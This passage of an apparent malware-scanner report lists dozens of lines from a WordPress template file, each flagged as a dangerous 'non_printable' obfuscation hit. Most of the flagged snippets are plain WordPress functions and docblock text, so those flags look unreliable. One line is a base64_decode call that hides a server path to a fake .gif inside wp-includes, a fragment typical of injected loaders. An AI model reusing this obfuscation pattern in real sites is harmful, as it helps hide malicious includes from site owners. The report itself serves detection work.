</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2672</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_date</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$before </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$after </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2697</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$the_date</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">will always </span><span style="color: #007700">return </span><span style="color: #0000BB">the date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2711</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">false Date the current post was written</span><span style="color: #007700">. </span><span style="color: #0000BB">False on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2713</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_the_date</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_the_date'</span><span style="color: #007700">, </span><span style="color: #0000BB">$the_date</span><span style="color: #007700">, </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2747</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_modified_date</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$before </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$after </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2765</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$the_modified_date</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2777</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">false Date the current post was modified</span><span style="color: #007700">. </span><span style="color: #0000BB">False on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_the_modified_date</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_header</span><span style="color: #007700">( </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2801</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_the_modified_date'</span><span style="color: #007700">, </span><span style="color: #0000BB">$the_time</span><span style="color: #007700">, </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2813</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_time</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2835</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">false Formatted date string </span><span style="color: #007700">or </span><span style="color: #0000BB">Unix timestamp </span><span style="color: #007700">if `</span><span style="color: #0000BB">$format</span><span style="color: #007700">` </span><span style="color: #0000BB">is </span><span style="color: #DD0000">'U' </span><span style="color: #007700">or </span><span style="color: #DD0000">'G'</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2838</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_the_time</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_the_time'</span><span style="color: #007700">, </span><span style="color: #0000BB">$the_time</span><span style="color: #007700">, </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2875</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_post_time</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">'U'</span><span style="color: #007700">, </span><span style="color: #0000BB">$gmt </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$translate </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2892</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns a sum of timestamp with timezone offset</span><span style="color: #007700">. </span><span style="color: #0000BB">Ideally should never be used</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2916</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_post_time'</span><span style="color: #007700">, </span><span style="color: #0000BB">$time</span><span style="color: #007700">, </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$gmt </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2924</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">allows to choose to instantiate from local </span><span style="color: #007700">or </span><span style="color: #0000BB">UTC time in database</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2936</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">DateTimeImmutable</span><span style="color: #007700">|</span><span style="color: #0000BB">false Time object on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_post_datetime</span><span style="color: #007700">( </span><span style="color: #0000BB">$post </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$field </span><span style="color: #007700">= </span><span style="color: #DD0000">'date'</span><span style="color: #007700">, </span><span style="color: #0000BB">$source </span><span style="color: #007700">= </span><span style="color: #DD0000">'local' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2965</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$datetime</span><span style="color: #007700">-></span><span style="color: #0000BB">setTimezone</span><span style="color: #007700">( </span><span style="color: #0000BB">$wp_timezone </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">returns a true Unix timestamp</span><span style="color: #007700">, </span><span style="color: #0000BB">not summed with timezone offset</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2979</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">false Unix timestamp on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_post_timestamp</span><span style="color: #007700">( </span><span style="color: #0000BB">$post </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$field </span><span style="color: #007700">= </span><span style="color: #DD0000">'date' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2988</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$datetime</span><span style="color: #007700">-></span><span style="color: #0000BB">getTimestamp</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3000</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_modified_time</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3023</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">false Formatted date string </span><span style="color: #007700">or </span><span style="color: #0000BB">Unix timestamp</span><span style="color: #007700">. </span><span style="color: #0000BB">False on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_the_modified_time</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_the_modified_time'</span><span style="color: #007700">, </span><span style="color: #0000BB">$the_time</span><span style="color: #007700">, </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3064</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_post_modified_time</span><span style="color: #007700">( </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">'U'</span><span style="color: #007700">, </span><span style="color: #0000BB">$gmt </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$translate </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_post_modified_time'</span><span style="color: #007700">, </span><span style="color: #0000BB">$time</span><span style="color: #007700">, </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$gmt </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_weekday</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_weekday_date</span><span style="color: #007700">( </span><span style="color: #0000BB">$before </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$after </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3188</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_head</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_footer</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_body_open</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">feed_links</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3301</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">feed_links_extra</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3531</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"L3Zhci93d3cvYmFydG9saW5pL2JhcnRvbGluaS5jb20udWEvd3AtaW5jbHVkZXMvaW1hZ2VzL3hpdC0zeC5naWY="</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3532</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rsd_link</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3551</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_strict_cross_origin_referrer</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3564</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_site_icon</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_resource_hints</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 368</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3740</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_preload_resources</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the link</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 382</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
